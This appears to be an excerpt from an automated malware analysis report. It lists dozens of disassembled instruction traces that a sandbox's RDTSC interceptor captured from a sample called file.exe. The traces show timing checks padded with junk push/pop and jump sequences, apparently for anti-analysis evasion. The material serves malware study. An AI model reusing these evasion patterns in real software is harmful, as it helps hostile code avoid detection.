Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B337 second address: B9B37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB8FCD6487Eh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB8FCD64889h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B37E second address: B9B396 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8FCCA77B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jc 00007FB8FCCA77B6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B396 second address: B9B3B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FB8FCD64876h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push esi 0x00000012 jo 00007FB8FCD64876h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B3B3 second address: B9B3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B3B7 second address: B9B3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9B457 second address: B9B465 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F6EA second address: B9F6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F6F2 second address: B9F6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9F85B second address: B9F87A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FB8FCD64888h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9FDB6 second address: B9FDBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA0094 second address: BA00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD6487Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00AA second address: BA00B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00B0 second address: BA00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00B4 second address: BA00E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB8FCCA77C4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA00E2 second address: BA00E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D6A second address: BA5D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D70 second address: BA5D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD6487Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5D87 second address: BA5D9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4779 second address: BA477D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA477D second address: BA4789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4789 second address: BA4799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4799 second address: BA47C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FB8FCCA77D7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA47C9 second address: BA47DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCD6487Bh 0x00000009 jbe 00007FB8FCD64876h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4909 second address: BA4916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jc 00007FB8FCCA77B6h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4916 second address: BA491C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA491C second address: BA4920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4920 second address: BA492E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB8FCD6487Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4B9F second address: BA4BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C6h 0x00000009 pop edi 0x0000000a jns 00007FB8FCCA77BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5492 second address: BA5498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA563C second address: BA5640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5640 second address: BA5646 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA5646 second address: BA566A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB8FCCA77C8h 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA566A second address: BA5670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5739E second address: B573A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FB8FCCA77B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA44C9 second address: BA44D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADE8A second address: BADEA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB8FCCA77C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAD9EB second address: BAD9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAD9EF second address: BADA11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FB8FCCA77BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA11 second address: BADA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007FB8FCD64876h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FB8FCD6487Bh 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FB8FCD64889h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA4B second address: BADA50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BADA50 second address: BADA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD64888h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8BD second address: BAE8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8C3 second address: BAE8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8C8 second address: BAE8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAE8D2 second address: BAE8F5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8FCD64887h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA2E second address: BAEA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA34 second address: BAEA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB8FCD6487Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA49 second address: BAEA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB8FCCA77B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA55 second address: BAEA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BAEA59 second address: BAEA73 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FB8FCCA77B8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB28D7 second address: BB28FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB8FCD64876h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB8FCD6488Ch 0x00000012 jmp 00007FB8FCD64884h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB28FF second address: BB290A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB8FCCA77B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB290A second address: BB2910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B268DC second address: B268E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B268E2 second address: B268E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7B5A second address: BB7B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6856 second address: BB6860 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8FCD64882h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7819D second address: B781B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jns 00007FB8FCCA77BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7829A second address: B782A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B782A0 second address: B782A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78434 second address: B78438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78438 second address: B78441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784A7 second address: B784AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784AD second address: B784B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B784B5 second address: B784C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007FB8FCD64880h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B785B5 second address: B785BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B20 second address: B78B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FB8FCD6487Fh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1AC9h], edi 0x00000014 push 0000001Eh 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FB8FCD64878h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B64 second address: B78B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B69 second address: B78BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8FCD64888h 0x00000008 jmp 00007FB8FCD64883h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007FB8FCD6487Ah 0x00000018 pop ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78ED4 second address: B78ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78ED8 second address: B78F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FB8FCD64878h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1A28h], eax 0x00000028 lea eax, dword ptr [ebp+12489B7Eh] 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FB8FCD64878h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 add dword ptr [ebp+122D24A7h], eax 0x0000004e sbb dh, 00000073h 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FB8FCD64882h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78F4E second address: B78F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78F52 second address: B78FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB8FCD64878h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12489B3Ah] 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FB8FCD64878h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 jg 00007FB8FCD6487Bh 0x0000004a cmc 0x0000004b push eax 0x0000004c ja 00007FB8FCD6487Eh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78FB7 second address: B5739E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 clc 0x00000009 call dword ptr [ebp+122D36A9h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB8FCCA77C5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6ECD second address: BB6ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB71B2 second address: BB71D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB8FCCA77C7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB7669 second address: BB766D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9CC7 second address: BB9CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9CCD second address: BB9CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBD278 second address: BBD2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FB8FCCA77C2h 0x0000000d jp 00007FB8FCCA77B6h 0x00000013 ja 00007FB8FCCA77B6h 0x00000019 jo 00007FB8FCCA77BAh 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 js 00007FB8FCCA77D3h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCB4C second address: BBCB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FB8FCD6487Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCF9F second address: BBCFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8FCCA77B6h 0x0000000a popad 0x0000000b push esi 0x0000000c jnp 00007FB8FCCA77B6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC19EB second address: BC19F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7A96 second address: BC7A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7A9C second address: BC7AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD6487Fh 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d jg 00007FB8FCD64876h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007FB8FCD64876h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AC4 second address: BC7AE3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB8FCCA77B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB8FCCA77BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AE3 second address: BC7AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7AE9 second address: BC7AF3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8FCCA77B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6827 second address: BC686D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB8FCD64881h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FB8FCD64888h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FB8FCD64880h 0x0000001a jp 00007FB8FCD64885h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC69DB second address: BC69E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FB8FCCA77B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B789F2 second address: B78A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
